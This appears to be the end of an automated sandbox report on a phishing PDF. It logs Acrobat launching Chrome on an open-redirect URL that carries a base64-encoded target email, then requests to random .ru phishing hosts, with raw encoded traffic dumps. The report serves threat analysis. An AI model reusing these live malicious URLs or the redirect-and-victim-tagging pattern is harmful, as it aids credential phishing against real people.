                                                                                                        2025-01-09 16:19:03 UTC16384OUTData Raw: 47 41 37 44 64 66 6f 77 43 36 54 32 79 75 78 4c 73 7a 73 57 75 70 75 78 38 44 44 53 39 50 58 37 65 73 77 44 68 75 53 65 53 44 73 31 43 63 34 44 44 2b 4e 61 53 72 54 61 73 47 47 34 44 74 44 73 2b 77 6c 44 38 34 44 46 44 31 34 73 78 45 6a 44 54 34 7a 65 44 2b 44 48 65 58 57 44 2b 44 42 62 44 36 53 24 44 51 57 53 57 44 4c 46 6d 34 38 62 73 4a 63 34 34 53 38 73 50 44 63 34 44 42 75 41 44 79 34 73 76 73 6b 44 6d 75 78 30 73 78 44 46 65 54 75 73 49 44 66 53 34 76 44 2d 44 53 65 53 43 78 63 44 48 75 53 57 44 61 65 44 54 73 44 44 76 24 24 6c 78 4c 44 75 75 4f 44 44 50 73 73 44 4c 73 73 38 54 50 44 57 34 4f 61 78 43 47 51 54 73 61 78 56 44 30 34 4e 38 78 2b 44 30 34 42 6f 65 4b 75 73 4b 71 4f 44 59 77 34 36 58 6c 61 32 34 6d 56 44 44 44 4c 6d 55 53 30 54 6d 64 31
                                                                                                        Data Ascii: GA7DdfowC6T2yuxLszsWupux8DDS9PX7eswDhuSeSDs1Cc4DD+NaSrTasGG4DtDs+wlD84DFD14sxEjDT4zeD+DHeXWD+DBbD6S$DQWSWDLFm48bsJc44S8sPDc4DBuADy4svskDmux0sxDFeTusIDfS4vD-DSeSCxcDHuSWDaeDTsDDv$$lxLDuuODDPssDLss8TPDW4OaxCGQTsaxVD04N8x+D04BoeKusKqODYw46Xla24mVDDDLmUS0Tmd1
                                                                                                        2025-01-09 16:19:03 UTC2215OUTData Raw: 66 71 4d 49 63 71 44 59 44 38 57 68 78 42 49 65 58 56 44 53 36 2d 59 68 74 6e 61 4b 30 58 59 76 73 41 56 4e 54 58 72 73 4e 44 72 30 44 4c 4a 54 42 55 34 44 31 38 47 55 35 78 57 33 35 70 4c 6e 6d 43 70 54 6c 53 50 6d 2b 6e 73 66 74 30 4a 41 42 64 33 4b 6d 65 44 51 44 39 6e 65 57 74 36 44 71 44 51 4e 41 66 2d 31 43 4f 69 66 4a 4f 2b 6f 48 58 55 47 63 7a 73 63 69 59 57 44 4b 4d 6e 46 44 36 65 2d 66 72 48 6e 62 72 6f 44 77 62 73 6e 44 62 44 77 4a 4b 34 49 39 44 46 2b 33 4a 44 62 64 51 75 54 5a 57 6a 76 71 56 75 56 6e 32 34 46 35 74 6a 42 2b 44 7a 54 31 77 73 75 44 2d 54 47 74 36 4e 65 32 57 73 36 44 34 77 6e 77 44 4f 44 79 68 65 75 53 56 54 77 75 37 5a 31 65 75 31 61 44 65 53 77 4e 35 6a 24 62 76 77 73 30 4b 68 65 53 30 44 56 44 73 6e 64 57 44 76 33 47 64 34
                                                                                                        Data Ascii: fqMIcqDYD8WhxBIeXVDS6-YhtnaK0XYvsAVNTXrsNDr0DLJTBU4D18GU5xW35pLnmCpTlSPm+nsft0JABd3KmeDQD9neWt6DqDQNAf-1COifJO+oHXUGczsciYWDKMnFD6e-frHnbroDwbsnDbDwJK4I9DF+3JDbdQuTZWjvqVuVn24F5tjB+DzT1wsuD-TGt6Ne2Ws6D4wnwDODyheuSVTwu7Z1eu1aDeSwN5j$bvws0KheS0DVDsndWDv3Gd4
                                                                                                        2025-01-09 16:19:03 UTC1361INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:19:03 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 4624
                                                                                                        Connection: close
                                                                                                        cf-chl-out-s: ZE31JWkDPKoqc1oo/xAqdEzwa5wRUdNc/zs0gYnk/6MRoA1siHRqSzcuU3bTEx41K9su3PwdL/qG6ELPUSfUWIbulrzxV6moBdvJtEDftfO8EPO2L4ioCgbM7NQwolWVg/NJBatBIY+6ETacogVe9wvd43JleE9CTRI/R5Ro2DVBzYu+41gVsQjORqDA1wmsDCe7vR9/bVnjIuFnx+K6ZDRDlpYQVhwTHo66NEm2iWVLHs2/xfF/9c0tlW09g4jDXogIs0NITpEvME4v3ZGr+BjOT/TdCBm6V7t2Q0n6jt0JYfOrs4CaH3j6GvCWvq/IW9oKyBs1NANVYGjY/b43sP8UlriMY6l+6u6TAGrfkwIg/nQaGRqUDIzni4Pere5o0+3jheAUHTalvtobtE0OCfcMdlmp/RYJ5oNhJHGQMjd6hjyLauL2H4JGFMxLGltC4IrtltuklBlUB35Aw2XXVrkPHM4lfFDkaX/sDCLpysL1Ois+HA8lfuOGP0HEvl1PAR4VEZgIoyNibyHFjNRJfe6AyuhwKJWp3KDOOIcWfrKobV0FOarWRD45YHlSgTnGd1kM8NEXlPfXF+twsD1rPX32/ThZABpPGereccW05HGzYdpGdcsWHSLClrChaZ3hF0KMpq1aYDMUm4imA8w54Eqf5skpGEYXgSP+wtoBalKiYa0l4Oz4BlbUa2qS/0gAm6AGj0rqZzfY0TGzjp+edLdjSzVlk+Ih32Rudd0RzIzraxKFWnVllXrLC56fEUVQIlviGZYosH83BuwThWCNjdj6H3Mjlmh/Vqt18ibVY3c9eddgUF45FwDSunZlvo/6rO1P+HgkrAAmBs+Ex5mU13vTYINk9Ne/2UhMP//0tUZSgQGko2N+R/jISEyt3I2mQRy2bedLyxr6jCeibAxOoSysnn9/g9JFA+FBRt8429ehpJxrETmTCa/Xu9gZrCowp2PuiHmWwq8r8K5gsUc7dU5oNbdYUKZXfvSxv8zLjvc=$uLQhZ [TRUNCATED]
                                                                                                        cf-chl-out: t/c0kQz80DK2QxzgWzoGVULz3JGWIcIHYxCrJrbvMewV+REcLt/aJ7RWCKwBvivV7PIxHLcOOE2c52upmQqFQhCx50j+N3gyaBk/90nxHw==$fs/+e+rnPRljKpo4
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5bf2c1be65e79-EWR
                                                                                                        2025-01-09 16:19:03 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                        Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:19:03 UTC1345INData Raw: 6b 71 65 63 67 73 6d 6c 72 71 65 62 30 4b 36 70 6e 64 4b 73 78 38 50 57 6b 4b 36 56 31 39 4f 39 34 63 76 4d 34 72 6e 67 35 73 58 51 78 63 65 2b 7a 63 61 34 36 4f 66 50 72 62 32 77 79 73 48 4d 74 4d 37 46 35 4c 53 76 32 64 76 2b 76 38 47 2f 39 64 48 65 78 63 67 47 31 66 37 49 43 75 6e 48 44 2b 66 75 33 74 49 57 39 2b 73 4d 30 78 76 6a 44 42 50 57 44 2f 41 65 49 2f 44 38 47 51 66 6d 41 65 48 37 41 43 6e 6e 2f 42 7a 6e 4d 66 33 6c 41 44 62 31 43 67 49 33 39 51 67 49 4c 50 51 33 43 78 63 64 4f 69 30 6b 41 30 41 71 4a 6b 6f 44 4e 55 4a 47 43 7a 78 48 4c 53 38 65 4b 7a 39 46 51 79 6b 77 47 45 56 53 53 56 64 64 4e 6c 30 2f 4f 56 5a 6a 4a 6d 46 53 52 6c 35 46 51 6b 39 6b 62 30 38 71 51 55 6b 31 61 33 52 4f 5a 54 51 37 62 55 64 6f 54 33 70 65 5a 48 4e 66 59 6b 39
                                                                                                        Data Ascii: kqecgsmlrqeb0K6pndKsx8PWkK6V19O94cvM4rng5sXQxce+zca46OfPrb2wysHMtM7F5LSv2dv+v8G/9dHexcgG1f7ICunHD+fu3tIW9+sM0xvjDBPWD/AeI/D8GQfmAeH7ACnn/BznMf3lADb1CgI39QgILPQ3CxcdOi0kA0AqJkoDNUJGCzxHLS8eKz9FQykwGEVSSVddNl0/OVZjJmFSRl5FQk9kb08qQUk1a3ROZTQ7bUdoT3peZHNfYk9
                                                                                                        2025-01-09 16:19:03 UTC1369INData Raw: 35 53 7a 74 63 43 53 76 34 31 38 65 36 39 2b 67 4c 54 48 6d 59 5a 2f 76 71 2b 43 6f 73 36 54 31 61 57 68 71 35 48 55 6b 4b 76 62 32 62 47 64 34 4a 79 74 7a 4e 69 38 33 73 53 68 75 74 4c 48 70 2b 65 6b 77 36 6a 47 73 4c 44 79 36 36 2f 57 73 4c 58 72 32 62 7a 70 30 4c 58 39 74 2b 37 58 2b 50 4c 33 35 73 48 49 41 2b 41 42 7a 66 72 58 7a 41 6a 4d 30 63 2f 56 45 42 4d 59 37 76 58 70 48 76 51 54 41 64 6e 33 44 50 66 69 45 64 2f 6e 35 68 50 6b 2b 79 72 72 37 4f 7a 70 38 43 44 72 38 65 66 77 4b 6a 6a 30 42 76 62 30 46 44 51 54 2b 69 4d 68 49 6a 67 61 41 51 4a 4b 4e 45 63 4c 43 7a 70 4c 4c 41 34 6a 52 46 52 53 51 69 4a 54 46 78 70 58 47 78 59 55 50 52 4a 56 4f 47 51 65 59 6b 64 67 4e 69 4d 67 52 6a 63 6d 4c 55 5a 6c 5a 47 34 73 56 54 4a 79 61 7a 64 34 4f 54 52 5a
                                                                                                        Data Ascii: 5SztcCSv418e69+gLTHmYZ/vq+Cos6T1aWhq5HUkKvb2bGd4JytzNi83sShutLHp+ekw6jGsLDy66/WsLXr2bzp0LX9t+7X+PL35sHIA+ABzfrXzAjM0c/VEBMY7vXpHvQTAdn3DPfiEd/n5hPk+yrr7Ozp8CDr8efwKjj0Bvb0FDQT+iMhIjgaAQJKNEcLCzpLLA4jRFRSQiJTFxpXGxYUPRJVOGQeYkdgNiMgRjcmLUZlZG4sVTJyazd4OTRZ
                                                                                                        2025-01-09 16:19:03 UTC1369INData Raw: 36 66 6b 72 47 77 73 62 71 4b 71 61 79 61 72 36 71 73 6e 71 4f 65 76 38 69 73 71 39 47 59 79 62 71 63 6c 4c 65 64 30 4c 61 2b 31 4b 4f 31 33 62 2f 41 6f 62 50 55 78 4e 62 59 32 61 33 6f 7a 37 2f 4d 77 63 66 57 30 4c 44 78 35 4e 62 77 37 73 37 36 75 4c 33 68 37 66 79 39 41 4d 44 57 30 39 6e 69 2f 63 33 68 37 75 73 42 34 75 2f 68 38 74 4c 4f 47 67 30 51 36 2f 58 32 33 50 7a 72 34 66 54 7a 41 78 6b 44 2f 50 4d 64 49 51 67 47 48 4f 34 43 2b 51 77 4d 2f 42 49 34 39 77 7a 77 4f 54 6f 50 47 44 30 73 45 77 38 57 42 42 67 54 4e 52 6f 59 4f 52 63 32 46 6b 74 4e 4f 42 31 42 44 6c 41 6e 52 45 6c 45 4b 6b 6f 53 46 69 39 64 56 54 73 33 54 79 49 32 51 43 38 66 50 44 74 59 5a 56 35 49 58 43 39 49 4f 6d 4e 64 50 54 35 6b 55 32 70 4a 55 6e 70 4a 54 31 68 50 59 56 42 79 58
                                                                                                        Data Ascii: 6fkrGwsbqKqayar6qsnqOev8isq9GYybqclLed0La+1KO13b/AobPUxNbY2a3oz7/MwcfW0LDx5Nbw7s76uL3h7fy9AMDW09ni/c3h7usB4u/h8tLOGg0Q6/X23Pzr4fTzAxkD/PMdIQgGHO4C+QwM/BI49wzwOToPGD0sEw8WBBgTNRoYORc2FktNOB1BDlAnRElEKkoSFi9dVTs3TyI2QC8fPDtYZV5IXC9IOmNdPT5kU2pJUnpJT1hPYVByX
                                                                                                        2025-01-09 16:19:03 UTC541INData Raw: 38 6f 4a 2b 45 7a 4b 61 73 71 34 71 6e 69 70 33 45 30 36 6e 58 6c 63 71 75 33 4a 36 7a 76 4d 2f 43 75 63 44 43 74 73 2b 77 77 38 71 2f 78 36 53 6c 34 63 48 4c 76 73 66 4b 77 75 6a 75 31 4d 48 34 7a 64 47 7a 74 66 66 49 32 38 37 36 32 74 44 77 2f 74 66 42 30 67 76 43 36 41 48 36 32 76 34 52 36 65 58 67 35 2b 37 75 38 39 58 73 36 41 77 4f 39 4f 73 68 46 52 76 77 46 41 4d 53 39 77 45 70 46 76 66 6b 44 79 51 43 4c 2b 33 39 42 76 30 70 45 41 45 35 41 77 67 48 4c 52 4d 67 48 77 34 44 4a 52 51 50 44 78 4d 63 4f 6b 56 4c 4a 6a 77 6b 4a 79 38 70 44 68 38 64 53 55 55 6a 4e 7a 45 54 4e 69 56 52 4d 79 6f 70 47 6a 41 34 47 31 4e 6f 4b 45 56 64 51 45 63 31 59 43 64 49 4f 55 39 6d 53 56 4e 43 4c 54 64 58 55 54 55 38 52 58 73 33 59 45 6c 77 55 30 39 6a 54 6c 35 48 50 32
                                                                                                        Data Ascii: 8oJ+EzKasq4qnip3E06nXlcqu3J6zvM/CucDCts+ww8q/x6Sl4cHLvsfKwuju1MH4zdGztffI28762tDw/tfB0gvC6AH62v4R6eXg5+7u89Xs6AwO9OshFRvwFAMS9wEpFvfkDyQCL+39Bv0pEAE5AwgHLRMgHw4DJRQPDxMcOkVLJjwkJy8pDh8dSUUjNzETNiVRMyopGjA4G1NoKEVdQEc1YCdIOU9mSVNCLTdXUTU8RXs3YElwU09jTl5HP2


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        36192.168.2.1749769104.18.95.414431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:19:04 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1140754575:1736436948:s57gMlu_d0GxrTPQdU_anznfPjLlEvsNKPsJD4qDoJc/8ff5be739bf042ad/vcG88keSW_X_91JV8E94BgxdsCtRYkoi0_UQuEtzmG0-1736439514-1.1.1.1-OFazbJ.OkiYW18PfYWhb0pzWwCU00_eRO3Ec6aHBp4nAU8cAXTKlmRFTp5m1r_Vr HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:19:04 UTC379INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 09 Jan 2025 16:19:04 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: LVCwKfXJz0VYabjKJpVbVY3MOQVjuCdIcEc=$NnKyigS67++krNNk
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5bf30ee7d0cbe-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2025-01-09 16:19:04 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        37192.168.2.1749771104.21.48.14431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:19:04 UTC681OUTGET /XKjHZhHbfYmhpubsmCuWquMukLoqwWivhWWUUTDVQBBOGTVVEMNKETMCNBQCXCWPVJHFKSPUCKFSWACXRDK HTTP/1.1
                                                                                                        Host: fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://nokixa.qemitorn.ru
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://nokixa.qemitorn.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:19:05 UTC882INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:19:05 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1iyFyej3EHhOw70XPezJ1Rhkj4r3gWu4nOJL2IZkjteuKE5bl7uhJo6k9%2B9rEcklN8TqevpoBoX5imFTClS5RFzUsri1pXChYHlE2uHP1j5cX4k6WWkOMaLizOm%2FGhoRgWNBIjFjuAVN02Q7BXGLRMt6Cs2fh%2B0Pyjropf0kzxK2jmuhET6pxYaK8KI8CsfNFEK8"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5bf343ad343be-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1580&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1259&delivery_rate=1819314&cwnd=226&unsent_bytes=0&cid=682a178d25d6150a&ts=570&x=0"
                                                                                                        2025-01-09 16:19:05 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2025-01-09 16:19:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        38192.168.2.1749775104.21.96.14431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:19:06 UTC471OUTGET /XKjHZhHbfYmhpubsmCuWquMukLoqwWivhWWUUTDVQBBOGTVVEMNKETMCNBQCXCWPVJHFKSPUCKFSWACXRDK HTTP/1.1
                                                                                                        Host: fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:19:07 UTC888INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:19:07 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWysfwSRLgVY0sVbcKrpxqdkwvIHDOxSACQ0lzHmRCkhnd9hhYJlEh%2BliyH2yde7tywp5jDHXIUjJ4ODFfumJt14ERYXDKvGrh%2FlNcT2Xexi9ii2PrzfU19w9Cw%2BoZ1j%2FZ4AJ8sfSsYMou6kv3xLTMTFI6J%2FJ3XVr6kRN1gvRGFRw6GUPWd1ujpU13AbCl%2FyRak3"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ff5bf3f6c2a1a48-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1978&rtt_var=755&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1049&delivery_rate=1436301&cwnd=157&unsent_bytes=0&cid=559c9f1757f5e2a2&ts=612&x=0"
                                                                                                        2025-01-09 16:19:07 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                        Data Ascii: 11
                                                                                                        2025-01-09 16:19:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:11:17:46
                                                                                                        Start date:09/01/2025
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Appraisal-nation-Review_and_Signature_Request46074.pdf"
                                                                                                        Imagebase:0x7ff636b00000
                                                                                                        File size:5'641'176 bytes
                                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:2
                                                                                                        Start time:11:17:47
                                                                                                        Start date:09/01/2025
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                        Imagebase:0x7ff60edf0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:3
                                                                                                        Start time:11:17:47
                                                                                                        Start date:09/01/2025
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1612,i,11819385348034914370,10990972197126798505,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                        Imagebase:0x7ff60edf0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:5
                                                                                                        Start time:11:17:48
                                                                                                        Start date:09/01/2025
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t
                                                                                                        Imagebase:0x7ff7d6f10000
                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:6
                                                                                                        Start time:11:17:49
                                                                                                        Start date:09/01/2025
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2440,i,14667198300048541513,3180845413884203349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                        Imagebase:0x7ff7d6f10000
                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        No disassembly